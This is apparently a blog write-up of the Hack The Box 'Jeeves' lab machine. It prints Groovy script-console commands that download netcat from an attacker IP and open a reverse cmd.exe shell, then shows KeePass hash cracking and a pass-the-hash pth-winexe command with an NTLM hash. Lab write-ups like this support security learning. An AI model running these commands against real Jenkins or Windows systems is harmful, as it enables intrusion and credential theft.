Last updated on June 15, 2020
So its time to face the butler. His name is Jeeves, anyway we will start with the nmap scan and see which ports we can knock.
data:image/s3,"s3://crabby-images/3ccb6/3ccb6371f11fb2cd23abaf528ace0217cfb6c751" alt=""
so we have 445 open. let’s knock on that shall we. maybe the butler might like it.
data:image/s3,"s3://crabby-images/e7923/e79237ab8542080f47122f1ef80bdafe141a0f7d" alt=""
ignore the 139. it should be 135 but anyway nothing. now port 50000
data:image/s3,"s3://crabby-images/d5361/d5361d50eb773383855405147e784606447b3c35" alt=""
so we found a webpage. let’s remove the port since port 80 was open
data:image/s3,"s3://crabby-images/05662/05662d0e1d91e4417e2ffc5cee6971f88ae0ef14" alt=""
seems like Mr.Jeeves is standing at the front door. When we tried to search he threw us out with an error
data:image/s3,"s3://crabby-images/e6b09/e6b092a40e05226e2ac4037d89e52fada06f676b" alt=""
since the butler was rude to us, we will bruteforce every directory available. dirbuster did its thing.
data:image/s3,"s3://crabby-images/c5185/c5185047b57eea852ec12dc65c9b4369550335aa" alt=""
Butler was changed. New guy was called Jenkins. Let’s see if he is as nice as Mr.Jeeves.
data:image/s3,"s3://crabby-images/89e4b/89e4b2ba055dc69952d83f10834121015a52e658" alt=""
ok since it was a windows box I couldnt inject in to /etc/passwd so found a cool video which shows how to get in to Jenkins admin
If you watch the video, you will see how he goes in to the admin section
data:image/s3,"s3://crabby-images/0f277/0f277990950ba52669b8753a3c48419ae2036382" alt=""
Go to Jenkins and then manage Jenkins you will find a script console. We can execute stuff there so we are still rolling
data:image/s3,"s3://crabby-images/3aa5b/3aa5bfacd158b8ec9f593c3dc9ce47edfa233cf8" alt=""
Now we need to upload and execute a reverse shell. After a bit of googling found a reverse shell. Or we can just transfer netcat as we did before.
data:image/s3,"s3://crabby-images/6cfe1/6cfe1a49a8123bc59719bc920ee0579d8b27cb52" alt=""
data:image/s3,"s3://crabby-images/5eb81/5eb81512383e2048982422978277bbbb5ee232ea" alt=""
data:image/s3,"s3://crabby-images/be955/be95501d0256b0d27f1993b5a9f4d358387ecb29" alt=""
def process = "powershell -command Invoke-WebRequest 'http://10.10.14.15/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
It’s downloaded to the box. Now lets see if we can run it.
def process = "powershell -command ./nc.exe 10.10.14.15 4444 -e cmd.exe".execute();
println("${process.text}");
data:image/s3,"s3://crabby-images/cc74f/cc74fe9ab562f7d35ef740c481ab7967a3f4a16f" alt=""
Alright now we have a shell. Relax a bit. I’m not gonna do kernel exploitation so lets find a way to get this done.
So we got a Windows 10 with a lot of hotfix’s installed.
data:image/s3,"s3://crabby-images/4e282/4e2824bcbf534ea66dd05d48940b64561e9e6c8a" alt=""
So we found a file called CEH.kdbx. Must be one of those CEH students file. Anyway lets crack it. If you google the extention you will know how to crack it
data:image/s3,"s3://crabby-images/3308e/3308ed4dd03ded322a8ed0b8634a59b943c25a5b" alt=""
we need to first transfer the file. Since we already have netcat in the box we can use it.
data:image/s3,"s3://crabby-images/48c03/48c03245fec654b704c702e262c449ad314be4df" alt=""
Have to get the hash to crack it. Use Keepass2john to get the hash and then john to crack it
data:image/s3,"s3://crabby-images/bccf3/bccf342a268590a7efe2eb10795d7fbef47b1edd" alt=""
After a while we got the pass.
data:image/s3,"s3://crabby-images/e5141/e5141fc0870493119409ebf3e1553517bff0c333" alt=""
so now lets login and see what is in there
data:image/s3,"s3://crabby-images/9fbcf/9fbcfb085d52231a730e7cb5da85c130dd886efd" alt=""
data:image/s3,"s3://crabby-images/5072b/5072b52a387ff66d3fbd11bd6b50b7ef9100642d" alt=""
after going through files found this hash. Accidentally deleted the screenshot which should be here. So I will just paste the command here.
pth-winexe --user=administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
data:image/s3,"s3://crabby-images/e524c/e524cc21f48d74d8aa1fab2e64051551fc18cd61" alt=""
BUT I DON’T WANNA LOOK ANY DEEPER. It was deep enough but yea that got me curious.
data:image/s3,"s3://crabby-images/c2759/c27590cb357c242ad6f07c0a66afe3d5b07b7ce5" alt=""
I guess that’s it for this box. Learnt from my mistakes.
Be First to Comment